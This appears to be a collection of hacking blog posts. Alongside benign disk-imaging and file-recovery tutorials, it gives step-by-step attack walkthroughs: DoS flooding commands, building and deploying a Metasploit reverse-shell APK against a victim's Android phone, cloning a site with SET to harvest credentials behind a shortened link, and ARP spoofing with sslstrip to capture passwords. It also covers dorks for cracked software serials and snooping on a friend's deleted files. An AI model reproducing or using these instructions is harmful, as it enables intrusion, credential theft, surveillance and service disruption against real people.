Google Hacks

Google hacks also know as Google dorks are specific keywords which can be used to dig out more details in a regular Google search query.

Now there are millions of such keywords we cannot discuss about each of these posts in a single post. So we will discuss about the most commonly used ones. 

  1. inurl: This keyword can be used to find out URL of multiple site having a certain URL query. 
  2. filetype: This keyword is used to look for specific file on the net.
  3. intitle:This keyword is used to find out URL with the specific  word in the title.
  4.  94fbr This keyword can be used to find serial keys(crack) of a software.




    For more hacks you can refer to the GHDB of exploit-db.com..



    Note:-

    we are using chrome in our demonstration for optimized results but you can eventually use any browsers as long as it connects to the Google's search engine...

     


Creating a disk image:1st step in digital forensics

A disk image is a virtual image of a storage device which functions like a actual physical drive. It is the first step in digital forensics. In other words you don't what to contaminate the evidence with your shit. This can also be used to recover a complete disk.


How to?
Windows:-
  1.  Download Winimage and install it.
  2. Run it with administrative privilege and now click OK.
  3. Now click on disk and then click on "create virtual hard disk image from physical drive".
  4. Now select your drive and click on OK and select the path of the directory in which you would like to save the disk image..

 Linux:-
  1. Open a terminal and type fdisk -l and hit enter.
  2. Now note the drive name.
  3. Now type dcfldd if=drive name of=file.dd and hit enter.
  4. Now type ls and hit enter to see if the file is created or not.  

Note:-
The file created by Winimage has .vhd extension and the file created on Kali Linux has .dd extension. Similarly if you use other programs then the extension may vary. The only thing you need to keep in mind is that you should be sure of the extensions which your forensics tool supports.

Multibootable USB: Many OS one pendrive

A multibootable USB is drive which is  programmed to  boot more than one operating system without altering the computer on which it is done.This is helpful for demonstration purpose when you cannot carry your laptop or when you are working on some critical hack and you don't want to get caught. 


What you need?
YUMI

How to?
  1. Plug in your drive. Open YUMI with administrative privileges.
  2. Now hit "I agree" for the license agreement.
  3. Now select your USB device from the drop down menu. In our case it was F and you can also select the format option if you don't remember the file system of you drive.
  4.   Now select the Linux distribution from the drop down list which you want to install on the drive. If you have the ISO and the program is unable to automatically locate it you can manually go to the folder in which you have saved it. But if you don't have the ISO then you can check the box which says "download the ISO".
  5.  Wait for it to do its thing. It will open the 7 zip or various other programs as per requirement so don't freak out.
  6.  Now it will ask you "Would you like to add more ISO/Distro Now on F:?". Hit yes and do the steps 4 and 5 again. 
  7. After you have installed all the distributions you want then you can click on finish.
  8. Now plug the drive in any computer and use your operating system.


Note:- 
  • You can only install a limited number of operating systems on a drive as each operating system has different size.
  •  And if your system has a CD drive then you might need to change the boot sequence in the bios.

Denial of service attacks:Dos attacks

Denial of service attack(DOS) is one of the most basic attack which can be done against any network. In this attack we flood the network or web server with different legitimate looking requests an the legitimate user is unable to access the service. There are various types of denial of service attack depending on the type of request used. A distributed denial of service attack is a denial of service attack in which the web server or the network is flooded by different attackers at the same time so that the network or web server crashes(party play).




How to?
There are various ways and tools to perform a denial of service attack.
  1. The most basic way to perform an denial of service attack with and windows machine is by typing in the command ping ip -t -l 19000 here -t is for delay time of the packets and -l is for the length of the packet. But this method is outdated and hence the magnitude required to crash is very high. You can consider this as the method your grandfather will use to attack the networks which are of his age and are still being used without any alterations. 
  2. The second way to attack is by using the famous LOIC. Low Orbit Ion Cannon is an open source stress testing tool which has a GUI. It is easy to use as you only need to set the URL or ip and then hit lock on then you can change the settings as per your requirements and then just hit fire. This tool is available in both windows as well as android. According to some rumors the famous hacktivist group "Anonymous" use this tool in most of their attacks.
  3. There are various tools in Kali Linux to perform such attacks but the best way is by using the command flood_router6 interface where interface can be eth0 or any other interface if your target is using an windows regular or server version lower than 8. We haven't tested this on higher versions so we don't know how it may react against this attack.
  4. To attack a router with a SYN dos attack you can use the tool present in msfconsole. Just type use auxiliary/dos/tcp/synflood. Now type set rhost ip to set the ip of the host machine. At the end type exploit to start the exploitation.



Note:- 
These attacks can be easily detected by intrusion detection system which might block the specific port or alert the system admin.  This attack is often exaggerated by the media but is very weak against large setups. 

Hacking an android phone with Metasploit

Android devices have become a potential target from the day they were introduced in the market. The are proved to be good targets as they give out a lot of information about the target. There are various ways to hack android phone like through an app, browser, etc.



What you need?
All you need is Kali Linux installed on Vmware.

How to?
  1. Open the terminal and type the command ifconfig and note down the eth0 ip.
  2. Now type the command cd Desktop so that you can get your apk file on the desktop of the virtual machine.
  3. Now type the command msfpayload android/meterpreter/reverse_tcp LHOST= ip LPORT=port R > hcak.apk. Here you have to paste the ip after LHOST and you can change hcak to any name you would prefer for the app.
  4. Now type msfconsole & hit enter and then type use exploit/multi/handler & hit enter.
  5. Now type set payload android/meterpreter/reverse_tcp and hit enter to set the payload for the handler.
  6. Now to set the listener ip and port type set lhost ip and set lport port (make sure that the ip and port should be the same as that of the msfpayload command). To check if the ip and host are properly set type show options and hit enter.
  7. Now type exploit and hit enter and wait for the victim to install the apk and open it.
  8. Now type ifconfig or sysinfo to find out details about your target.You can try different commands to take snapshots, webcam snaps, voice recording,etc.
Note:- 
You will only have the access to the phone till the session ends if the session ends then you have to wait till the victim runs the app again. 

SET: Phishing like a Pro

Phishing is a technique used by hackers to get the username and password by asking the victim to enter their credentials into a webpage which looks similar to the original site. This technique need your social engineering skills with a fair set of programming skills. And you also need to know a lit  Kali Linux provides a tool kit Know as SET(Social Engineering Tool kit) which makes the complex process a lot easier and a lot more systematic.


But but but this trick is only successful on a retard user.

What you need?

 All you need is Kali Linux installed on Vmware.

How to
  1. Start the terminal and type ifconfig and note the eth0 ip which is your Ethernet ip. 
  2. Now type the command service metasploit start to start the metasploit service.
  3. Now type the command setoolkit and hit enter to start the SET tool kit. And then select type 1 and hit enter.
  4. Now select the option 2 from the list and hit enter .
  5. Now select the option 3 form the list and hit enter.
  6. Now select the option 2 which is site cloner from the list and hit enter.
  7. Now enter the eth0 ip which you noted in the beginning by using ifconfig.And then hit enter and the enter the site URL(http://www.anysite.com) and hit enter.
  8.  Now type the ip on any web browser to see the phishing site. Paste the ip in Google URL shortener to convert the ip into a good looking URL. Send this to the victim via various methods and wait. After the retard user enters the username and password. Check the file which has the name like harvester_date.txt in the folder /var/www/ . 

Note:- 
This trick will only work if the user is stupid enough to enter his/her credentials on the fake page. And another problem is that if you see the URL you can find out the difference between the original and  the fake one.  In other words it depends on User Retard Level. 

SSL Strip

What is SSL Strip? 
SSL strip is a type of man in the middle attack in which the request is converted to HTTP from an HTTPS request and then sent to the website through the router and then the browser connects to website through the HTTP connection.
 HTTPS is more secured that HTTP(According to security professionals) but according to hackers "EVERYTHING is Shit".


What you need?
  1. Kali Linux installed on Vmware 
  2. Android phone with Fing - Network Tools (optional)
How to?
  1. Start your virtual machine.
  2. Open the terminal and then type ifconfig. It will give you the list of interfaces. Note the wireless LAN interface(wlan*).
  3. Now type the commands echo 1 > /proc/sys/net/ipv4/ip_forward and then type iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-prot 8080 to forward the traffic.
  4. Then you can type the commands route -n (for gateway ip) and nmap -sS -O gateway ip (for target ip) or you can simply open the Fing - Network Tools to find out the router and target ip.
  5. Now to start the ARP spoofing by typing the command arpsoof -i wlan0 -t 192.168.1.
    123 -r 192.168.1.1
    .
    Here wlan0 can be replaced by your wireless LAN interface like wlan0, wlan1, wlan2, etc and the ip after -t is you target ip and the ip after -r is the router ip.
  6. Keep the arpspoof terminal running and then open a new terminal window and then type sslstrip -l 8080. 
  7. Now wait after the target logs into any site you will get a little details on the sslstrip window. Open a new terminal window and type cat sslstrip.log this command will open the log file and try to locate an mail id and password.
Note:-
This will not work on Facebook as the traffic is encrypted thus you won't get the username and password.
  

Recover & Retrive:Find out what your friend's secrets

Whenever we get a pendrive even if the drive is empty it still has a lot of information about what was stored on it. This can help you find out what he/she had saved on that drive or recover sensitivity information about your company which an employee had leaked. Recovery can be done for various reasons but the tricks remain the same.


What you need?
All you need is Kali Linux on Vmware.

How to? 

Level-1:- Recuva
Recuva is one of the basic file recovery software which can be used to recovery files deleted on a regular windows computer. This software is also portable, to make a portable version you only need to copy the files from the program files directory to your pendrive. It can recovery the files of a specific file format like images, videos, music, etc. It is useful to quickly recover the file which you might have accidentally deleted.
  

 We need to run a basic command which is fdisk -l which gives you the names of all devices which is used for tools to recover files of a USB stick mounted to your Linux system.





You can consider this as the first step towards file recovery in Kali Linux.






Level-2:- foremost
 foremost is a quick recovery tool available in Kali Linux. This tool can be used in audits where you need to recover the files deleted quickly. You can use various parameters according to the requirements of the audit. To find out about all the parameters you can run the command foremost -h. But if you want to recover all files and save them on a file then you can use the command foremost -t all -v -i device name -o directory.   Here -t is the parameter which decides the type of file, -i is the parameter which decides the device name or image name, -o is the parameter which decides the output directory.

Level-3:- scalpel
scalpel is like a bazooka  in the field of recovery. This is the ultimate recovery tool which can recover all the files deleted from a derive or image of that drive. To use this tool you will need to first do some changes in the .confg file which is present in etc/scalpel. You have to delete the # present in front of the file type. The best thing you can do is delete all the # persent in front of all the file formats. After this save it and then open a terminal and then type scalpel -h to find out about the different parameters you can use. To recover the files to a specific directory type the command scalpel device name or image file path -o output directory.


Note:- When you use tools like scalpel and foremost you get and audit.txt file with the actual files. This audit.txt file is consist the log of all files which were recovered by the tools. 

Another great feature of these tools is that it save all the different file extensions under different folders which is systematic and is helpful to sort the files and locate the file which is needed.